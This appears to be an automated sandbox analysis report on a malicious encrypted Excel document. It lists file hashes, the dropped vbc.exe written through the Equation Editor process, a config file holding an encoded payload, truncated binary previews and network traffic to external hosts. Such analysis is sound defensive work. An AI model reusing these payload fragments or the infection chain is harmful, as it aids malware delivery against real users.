Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="oiKzrMXmBsLAwr.QltHXSUMGnu" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <oiKzrMXmBsLAwr.QltHXSUMGnu>.. <setting name="GVHAFcoLuMoPWfbhcOLxs" serializeAs="String">.. <value>77f90f144f0f3f0f0f0f4f0f0f0f255f255f0f0f184f0f0f0f0f0f0f0f64f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f128f0f0f0f14f31f186f14f0f180f9f205f33f184f1f76f205f33f84f104f105f115f32f112f114f111f103f114f97f109f32f99f97f110f110f111f116f32f98f101f32f114f117f110f32f105f110f32f68f79f83f

C:\Users\user\Desktop\~$Doc7656.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	17672
Entropy (8bit):	6.083452939720215
Encrypted:	false
SSDEEP:	192:UmUm+uXCZS9d36cWvZo048xgVL4f6+aJS7wMU4sJlpeLEPGHAOH68QdEZWSA0pEL:f+uISL6cc48xULh+cS7sf0t6xaZ1+mhW
MD5:	5E56329C37A437E87B485914FD524AA9
SHA1:	4FA6777CB443C3065E6F5FDBA0B0F0820E166D49
SHA-256:	7B8ABFDD06C37CE096DE4B67C9839CB92F3DAB63BDA6CC1909597C24D1401C8C
SHA-512:	01CDEBEA72AE175143FDC1339B2AC2A8836D287C2C02C38FEEC6D60F4626642273DBD9A685EAB096CC0D2D7A92B9B24010D3722D86665192C6352BFFAE21D414
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yX............"...0..&...........E... ...`....@.. ....................................@..................................D..S....`..4............0............................................................... ............... ..H............text...$%... ...&.................. ..`.rsrc...4....`.......(..............@..@.reloc..............................@..B.................E......H.......4&...............................................................".(.....Vs!........s"........>..r...p.o%....".(&....Vs....('...t.........B.(?......(.........0..0........s.....+.../....r...po......(.....(......(......0............(.....+.+...0.....0...........r...p(.....+.+...2.....0..^........s......~....o......#...%..(.....o.......+%+...3...........(....(....o .......X....i2....+......0..!........s.....+...4....o......o#....+......0...........~.....+..*.

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.9968561314857025
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Doc7656.xlsx
File size:	2807296
MD5:	a7b89c653a674b9433e8442d59a0ff5e
SHA1:	351013e428322c0279dea23376601a5be5cfb664
SHA256:	26b10c1613e2ca9b53da75d03f5b8a8e11d90ba7cb55e4d499e749ffcfbf5a42
SHA512:	99149505bdc6877f6ecb174ef2f3afa95e6836719ca28772496f7deaa254768610a0f385f6edccc8977dbc66b4dbc28a5af1a882e6ddfd7924d2df98cbe5c7e2
SSDEEP:	49152:xSpPouCE5f1Lhomo6E94QKzUK/Fft82RnLlugDQ4hye/O83N8ir5k1X2YI:cpt11Ho6o4QEtt8+nBuoFhyeZ3NVratO
File Content Preview:	........................>...................+...........................................................................................................z.......\|.......~...............z.......\|.......~...............z.......\|.......~......................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Doc7656.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2781208

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	2781208
Entropy:	7.99992025277
Base64 Encoded:	True
Data ASCII:	. p * . . . . . x . h $ . . . . . h . = . . . q + { v N M . . . i . . . # . . . . K . . . . . m t : . . . . s B . . ; 6 . . 0 H . ^ 1 . . . . . . . . . . _ . . . . . . . u y . . . . . . _ . . . . . . . u y . . . . . . _ . . . . . . . u y . . . . . . _ . . . . . . . u y . . . . . . _ . . . . . . . u y . . . . . . _ . . . . . . . u y . . . . . . _ . . . . . . . u y . . . . . . _ . . . . . . . u y . . . . . . _ . . . . . . . u y . . . . . . _ . . . . . . . u y . . . . . . _ . . . . . . . u y . . . . . . _ .
Data Raw:	06 70 2a 00 00 00 00 00 78 0f 68 24 0b 0f a6 cc f8 68 d9 3d ca 86 a9 71 2b 7b 76 4e 4d 03 90 f8 69 04 a0 d7 23 f5 8b 81 fb 4b ad f9 e6 89 1f 6d 74 3a 19 20 ff 1f e2 73 42 a2 e0 3b 36 88 cb 30 48 d3 5e 31 93 a3 da fd fa ef 05 c5 13 8d 5f b0 eb f9 dd c1 e4 8d 75 79 fa ef 05 c5 13 8d 5f b0 eb f9 dd c1 e4 8d 75 79 fa ef 05 c5 13 8d 5f b0 eb f9 dd c1 e4 8d 75 79 fa ef 05 c5 13 8d 5f b0

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.56771105117
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . F . . . . . . n . 4 . . . . . < . N ` $ . S . U . . . . P . , . . . . D . ) . . Q . = K ? - . . _ b 5 B . . ^ . . . r . . . . . . . .
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/02/21-20:25:03.644178	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49181	23.227.38.74	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 2, 2021 20:23:27.313252926 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:27.432331085 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:27.432421923 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:27.442110062 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:27.561327934 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:27.566231012 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:27.566261053 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:27.566294909 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:27.566312075 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:27.566317081 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:27.566338062 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:27.566353083 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:27.572011948 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:27.572037935 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:27.572076082 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:27.572098017 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:27.623965979 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:27.747339010 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:27.747541904 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:28.969687939 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:29.089688063 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.089715958 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.089729071 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.089740992 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.089757919 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.089775085 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.089796066 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.089814901 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.089831114 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.089847088 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.089869976 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:29.089894056 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:29.089896917 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:29.093151093 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:29.210161924 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.210187912 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.210207939 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.210227013 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:29.210232019 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:29.210251093 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:29.210270882 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:29.217170954 CET	49167	443	192.168.2.22	97.107.138.110
Mar 2, 2021 20:23:29.336014986 CET	443	49167	97.107.138.110	192.168.2.22
Mar 2, 2021 20:23:32.892946959 CET	49170	80	192.168.2.22	151.101.2.133
Mar 2, 2021 20:23:32.935240984 CET	80	49170	151.101.2.133	192.168.2.22
Mar 2, 2021 20:23:32.935354948 CET	49170	80	192.168.2.22	151.101.2.133
Mar 2, 2021 20:23:32.936647892 CET	49170	80	192.168.2.22	151.101.2.133
Mar 2, 2021 20:23:32.977047920 CET	80	49170	151.101.2.133	192.168.2.22
Mar 2, 2021 20:23:32.977423906 CET	80	49170	151.101.2.133	192.168.2.22
Mar 2, 2021 20:23:32.977442026 CET	80	49170	151.101.2.133	192.168.2.22
Mar 2, 2021 20:23:32.977519035 CET	49170	80	192.168.2.22	151.101.2.133
Mar 2, 2021 20:23:32.978887081 CET	49170	80	192.168.2.22	151.101.2.133
Mar 2, 2021 20:23:33.019283056 CET	80	49170	151.101.2.133	192.168.2.22
Mar 2, 2021 20:23:33.128626108 CET	49171	443	192.168.2.22	151.101.2.133
Mar 2, 2021 20:23:33.170710087 CET	443	49171	151.101.2.133	192.168.2.22
Mar 2, 2021 20:23:33.170820951 CET	49171	443	192.168.2.22	151.101.2.133
Mar 2, 2021 20:23:33.293736935 CET	49171	443	192.168.2.22	151.101.2.133
Mar 2, 2021 20:23:33.334269047 CET	443	49171	151.101.2.133	192.168.2.22
Mar 2, 2021 20:23:33.334502935 CET	443	49171	151.101.2.133	192.168.2.22
Mar 2, 2021 20:23:33.334526062 CET	443	49171	151.101.2.133	192.168.2.22
Mar 2, 2021 20:23:33.334623098 CET	49171	443	192.168.2.22	151.101.2.133
Mar 2, 2021 20:23:33.570574045 CET	49171	443	192.168.2.22	151.101.2.133
Mar 2, 2021 20:23:33.611277103 CET	443	49171	151.101.2.133	192.168.2.22
Mar 2, 2021 20:23:38.114012003 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.154359102 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.154520988 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.154921055 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.195890903 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.380904913 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.380955935 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.380995989 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.381035089 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.381058931 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.381072998 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.381094933 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.381112099 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.381150007 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.381165981 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.381197929 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.381239891 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.381259918 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.381278038 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.381335974 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.381721973 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.383268118 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.383342028 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.383399963 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.383419037 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.383460045 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.383544922 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.385059118 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.385113955 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.385154009 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.385191917 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.385191917 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.385242939 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.385617018 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.385682106 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.385766029 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.386717081 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.387289047 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.387376070 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.387600899 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.387645006 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.387700081 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.388516903 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.388560057 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.388633013 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.390302896 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.390614033 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.390678883 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.390700102 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.391169071 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.391242981 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.420869112 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.420907974 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.420979023 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.421287060 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.421313047 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.421367884 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.422255993 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.422286987 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.422353983 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.423207045 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.423234940 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.423300982 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.424148083 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.424179077 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.424237967 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.425111055 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.425138950 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.425234079 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.426064014 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.426095963 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.426147938 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.427016973 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.427047968 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.427095890 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.427978039 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.428005934 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.428070068 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.428931952 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.428961992 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.429013968 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.429038048 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.429884911 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.429913044 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.429968119 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.430867910 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.430901051 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.430983067 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.431807041 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.431833982 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.431902885 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.432754040 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.432775021 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.432825089 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.433720112 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.433751106 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.433799982 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.434684038 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.434711933 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.434760094 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.462521076 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.462558985 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.462656021 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.462873936 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.462901115 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.462943077 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.463814974 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.463841915 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.463902950 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.464700937 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.464728117 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.464788914 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.465563059 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.465593100 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.465663910 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.466454029 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.466485977 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.466542006 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.467314005 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.467340946 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.467380047 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.468242884 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.468269110 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.468313932 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.469202042 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.469230890 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.469288111 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.469939947 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.469966888 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.470017910 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.470818996 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.470850945 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.470905066 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.471693993 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.471715927 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.471784115 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.472548962 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.472579002 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.472641945 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.473448992 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.473469973 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.473530054 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.474294901 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.474322081 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.474378109 CET	49176	80	192.168.2.22	104.21.59.148
